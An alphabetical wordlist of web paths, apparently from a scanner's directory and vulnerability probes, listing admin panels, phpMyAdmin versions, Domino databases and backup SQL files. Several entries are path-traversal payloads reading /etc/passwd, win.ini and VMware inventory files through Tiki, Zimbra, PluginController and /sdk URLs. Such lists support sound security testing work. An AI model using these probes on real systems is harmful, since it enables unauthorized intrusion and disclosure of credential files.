/names.nsf
/names/
/ncadmin/
/nchelp/
/ncsample/
/net/
/netbasic/
/netcat/
/netmagstats/
/netscape/
/netshare/
/nettracker/
/network/
/new/
/news/
/news/readme.html
/nextgeneration/
/nfdesktop.jnlp
/nfservlets/servlet/SPSRouterServlet/
/nl/
/nmaplowercheck1495688743
/nmaplowercheck1495688744
/nntp/nd000001.nsf
/nntp/nd000002.nsf
/nntp/nd000003.nsf
/nntppost.nsf
/notes/
/noticias/
/nsw/admin/login.php
/ntsync45.nsf
/o/
/objects/
/ocsreports/
/odbc/
/officescan/
/officescan/console/html/ClientInstall/officescannt.htm
/officescan/console/html/cgi/cgiChkMasterPwd.exe
/officescan/console/html/images/icon_refresh.gif
/ojspdemos/
/old.sql
/old/
/old_files/
/oldfiles/
/openvbx/
/openx/www/admin/index.php
/oprocmgr-service/
/oprocmgr-status/
/oracle/
/oradata/
/order/
/orders/
/os/
/out/
/outgoing/
/owa/
/owa/8.1.375.2/themes/base/lgntopl.gif
/owners/
/ows-bin/
/p/
/page/
/pages/
/pages/admin/admin-login.asp
/pages/admin/admin-login.aspx
/pages/admin/admin-login.cfm
/pages/admin/admin-login.html
/pages/admin/admin-login.jsp
/pages/admin/admin-login.php
/pages/categoryresults.aspx
/pages/indexheader.php
/pages/indexviewentry.php
/pages/searcher.php
/panel-administracion/
/panel-administracion/admin.asp
/panel-administracion/admin.aspx
/panel-administracion/admin.cfm
/panel-administracion/admin.html
/panel-administracion/admin.jsp
/panel-administracion/admin.php
/panel-administracion/index.asp
/panel-administracion/index.aspx
/panel-administracion/index.cfm
/panel-administracion/index.html
/panel-administracion/index.jsp
/panel-administracion/index.php
/panel-administracion/login.asp
/panel-administracion/login.aspx
/panel-administracion/login.cfm
/panel-administracion/login.html
/panel-administracion/login.jsp
/panel-administracion/login.php
/partner/
/partners/
/partymgr/
/passport/
/password/
/passwords/
/path/
/payment/
/payments/
/pccsmysqladm/
/pec_admin/
/perl/
/perl5/
/personal/
/perweb.nsf
/pforum/
/phorum/
/photogallery_open.php
/php-my-admin/
/php-myadmin/
/php/
/phpBB/
/phpMyAdmin-2.2.3/
/phpMyAdmin-2.2.6/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.5-pl1/
/phpMyAdmin-2.5.5-rc1/
/phpMyAdmin-2.5.5-rc2/
/phpMyAdmin-2.5.5/
/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.7-pl1/
/phpMyAdmin-2.5.7/
/phpMyAdmin-2.6.0-alpha/
/phpMyAdmin-2.6.0-alpha2/
/phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-pl1/
/phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl3/
/phpMyAdmin-2.6.0-rc1/
/phpMyAdmin-2.6.0-rc2/
/phpMyAdmin-2.6.0-rc3/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1-pl2/
/phpMyAdmin-2.6.1-pl3/
/phpMyAdmin-2.6.1-rc1/
/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.2-beta1/
/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.2/
/phpMyAdmin-2.6.3-pl1/
/phpMyAdmin-2.6.3-rc1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.4-pl1/
/phpMyAdmin-2.6.4-pl1/libraries/grab_globals.lib.php
/phpMyAdmin-2.6.4-pl2/
/phpMyAdmin-2.6.4-pl3/
/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.6.4/
/phpMyAdmin-2.7.0-beta1/
/phpMyAdmin-2.7.0-pl1/
/phpMyAdmin-2.7.0-pl2/
/phpMyAdmin-2.7.0-rc1/
/phpMyAdmin-2.7.0/
/phpMyAdmin-2.8.0-beta1/
/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/
/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0.2/
/phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.4/
/phpMyAdmin-2.8.0/
/phpMyAdmin-2.8.1-rc1/
/phpMyAdmin-2.8.1/
/phpMyAdmin-2.8.2/
/phpMyAdmin-2/
/phpMyAdmin/
/phpMyAdmin2/
/phpPhotoAlbum/
/phpSecurePages/
/php_classes/
/phpbb/
/phpclassifieds/
/phpimageview/
/phpinfo.php
/phpmy-admin/
/phpmyadmin/
/phpnuke/
/phpprojekt/
/pics/
/picts/BC_bwlogorev.gif
/picts/menu_leaf.gif
/pictures/
/pictures/buttons/file_view_mark.gif
/pike/
/piranha/
/piranha/secure/passwd.php3
/pix/moodlelogo.gif
/pligg/
/pligg/readme.html
/plog-admin/
/pls/
/plsql/
/plssample/
/plssampleadmin/
/plssampleadmin_/
/plssampleadmin_help/
/plugins/PluginController.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
/plus/lurking.php
/pma/
/poll/
/polls/
/porn/
/portal/
/portals/
/postgres/
/postinfo.html
/postnuke/
/ppwb/
/printer/
/printer/image
/printers/
/priv/
/privacy/
/privado/
/private/
/private/sdc.tgz
/prod/
/program/
/projectserver/
/projectserver/Home/HomePage.asp
/projectserver/Tasks/Taskspage.asp
/projectserver/images/branding.gif
/projectserver/images/pgHome.gif
/projectserver/images/pgTask.gif
/protected/
/proxy/
/prueba/
/pruebas/
/prv/
/pub/
/public/
/publica/
/publicar/
/publico/
/publish/
/purchase/
/purchases/
/pw/
/python/
/q/
/qpadmin.nsf
/quickplace/quickplace/main.nsf
/r/
/random_banner/
/rcjakar/admin/login.php
/rdp/
/readme.html
/recycler/
/reg_1.htm
/repo/
/reports.nsf
/reportserver/
/repos/
/reqdetails.php
/respaldo.sql
/restoreinfo.cgi
/robots.txt
/rom-0
/rrc.htm
/rss.aspx
/rss.jsp
/rss.php
/rss.xml
/rss/
/s/
/sample/
/sample/siregw46.nsf
/samples/
/sc_webcat/ecat/cms_view.php
/scales_static_resource.jsf
/scanweb/images/scanwebtm.gif
/schema50.nsf
/scripts/fckeditor/editor/filemanager/connectors/test.html
/scripts/fckeditor/editor/filemanager/connectors/uploadtest.html
/sd/workorder/FileDownload.jsp
/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml
/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E//etc/vmware/hostd/vmInventory.xml
/sdk/../../../../../../../etc/vmware/hostd/vmInventory.xml
/sdk/../../../../../..//etc/vmware/hostd/vmInventory.xml
/search/
/sections/reference.inc.php
/security/xamppsecurity.php
/seti.php
/setup.cgi
/setup.nsf
/setup/password_required.html
/setupweb.nsf
/shared/help.php
/site/
/siteadmin/index.asp
/siteadmin/index.aspx
/siteadmin/index.cfm
/siteadmin/index.jsp
/siteadmin/index.php
/siteadmin/login.asp
/siteadmin/login.aspx
/siteadmin/login.cfm
/siteadmin/login.html
/siteadmin/login.jsp
/siteadmin/login.php
/sitecore/admin/
/sitecore/login/admin/
/sitedirectory
/skins/default/images/roundcube_logo.png
/smbcfg.nsf
/smconf.nsf
/smency.nsf
/smf/
/smhelp.nsf
/smmsg.nsf
/smquar.nsf
/smsolar.nsf
/smtime.nsf
/smtp.box
/smtp.nsf
/smtpibwq.nsf
/smtpobwq.nsf
/smvlog.nsf
/sourcebans/
/spControl.php
/spaw/demo.php
/splashfrog/
/sqlmanager/
/squirrelmail/images/sm_logo.png
/squirrelmail/src/login.php
/src/login.php
/srvnam.htm
/statmail.nsf
/statrep.nsf
/status/README
/statusnet/
/statusnet/README
/stauths.nsf
/stautht.nsf
/stconf.nsf
/stconfig.nsf
/stdnaset.nsf
/stdomino.nsf
/stlog.nsf
/store.php?action=view_cart
/store/
/store/docs/
/streg.nsf
/stsrc.nsf
/survey/
/svn/
/sw/auth/login.aspx
/swfupload/index.php
/switchSystem.html
/syssite/
/system-admin/
/system-administration/
/system-administrators/
/system-admins/
/system/admin/
/system/admin/comments_items.php
/system/admin/header.php
/system/login/
/system/login/reset?next=%2Fsystem%2Flogin&set-lang=en
/system/user/scn_user_list
/system_administration/
/systemadmin/
/t/
/t3lib/README.txt
/tbook.csv
/templates/beez/css/template_rtl.css
/templates/system/css/toolbar.css
/templates1/view_product.php
/test.asp
/test.class
/test.htm
/test.html
/test.php
/test.txt
/test/
/test/logon.html
/theme/images/en/login1.gif
/tiki-listmovies.php?movie=../../../../../../etc/passwd%001234
/tikiwiki/
/tiny_mce/plugins/filemanager/
/tinybrowser/upload.php
/tinymce/changelog.txt
/tinymcpuk/filemanager/browser.html
/tools/filemanager/skins/mobile/admin1.template.php
/tools_admin.cgi?
/tools_admin.php
/trac/
/tsweb/
/twitter/README
/typo3/README.txt
/typo3/index.php
/typo3/sysext/t3skin/images/login/typo3logo-white-greyback.gif
/u/
/ui/
/ui/imx/vmwareLogo-16x16.png
/ui/imx/vmwarePaperBagLogo-16x16.png
/ui/vManage.do
/update.php
/updown.php
/upload/data/settings.cdb
/upload/includes/js/files/upload.php
/upload/scp/ajax.php
/upload_multiple_js.php
/uploadsnaps.php
/uploadtester.asp
/user.asp
/user.aspx
/user.cfm
/user.html
/user.jsp
/user.php
/userreg.nsf
/users.sql
/usuarios.sql
/v/
/vanilla/
/vanillaforum/
/vanillaforums/
/vb/bnnr.php
/vbseo.php
/vhosts/ehcp/?op=applyforaccount
/vhosts/ehcp/?op=applyfordomainaccount
/vhosts/ehcp/?op=applyforftpaccount
/view/index.shtml
/vmware/
/vmware/imx/vmware_boxes-16x16.png
/vpn/images/AccessGateway.ico
/vpuserinfo.nsf
/w/
/web-console/Invoker
/web-console/ServerInfo.jsp
/web.nsf
/webadmin.asp
/webadmin.aspx
/webadmin.cfm
/webadmin.html
/webadmin.jsp
/webadmin.nsf
/webadmin.php
/webadmin/
/webadmin/admin.asp
/webadmin/admin.aspx
/webadmin/admin.cfm
/webadmin/admin.html
/webadmin/admin.jsp
/webadmin/admin.php
/webadmin/index.asp
/webadmin/index.aspx
/webadmin/index.cfm
/webadmin/index.html
/webadmin/index.jsp
/webadmin/index.php
/webadmin/login.asp
/webadmin/login.aspx
/webadmin/login.cfm
/webadmin/login.html
/webadmin/login.jsp
/webadmin/login.php
/webedition/
/webedition/we/include/we_modules/
/webline/html/admin/wcs/LoginPage.jhtml
/webline/html/agent/AgentFrame.jhtml
/webline/html/agent/default/badlogin.jhtml
/webline/html/forms/callback.jhtml
/webline/html/forms/callbackICM.jhtml
/webline/html/multichatui/nowDefunctWindow.jhtml
/weblink_cat_list.php
/weblog/
/weblog/wp-login.php
/weblogs/
/webmail/
/webmail/images/sm_logo.png
/webmail/src/login.php
/website/
/websql/
/webstore/
/websvn/
/wiki/
/wiki/Main_Page
/wiki/rankings.php
/wordpress/
/wordpress/wp-login.php
/workflowtasks/allitems.aspx
/workorder/FileDownload.jsp
/wp-login.php
/www/admin/index.php
/wwwlog/
/wwwlogs/
/x/
/x_logo.gif
/xoda/
/xoda/README
/xymon/menu/menu.css
/y/
/z/
/zencart/docs/
/zikula/index.php
/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../dev/null%00
/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
/zp-core/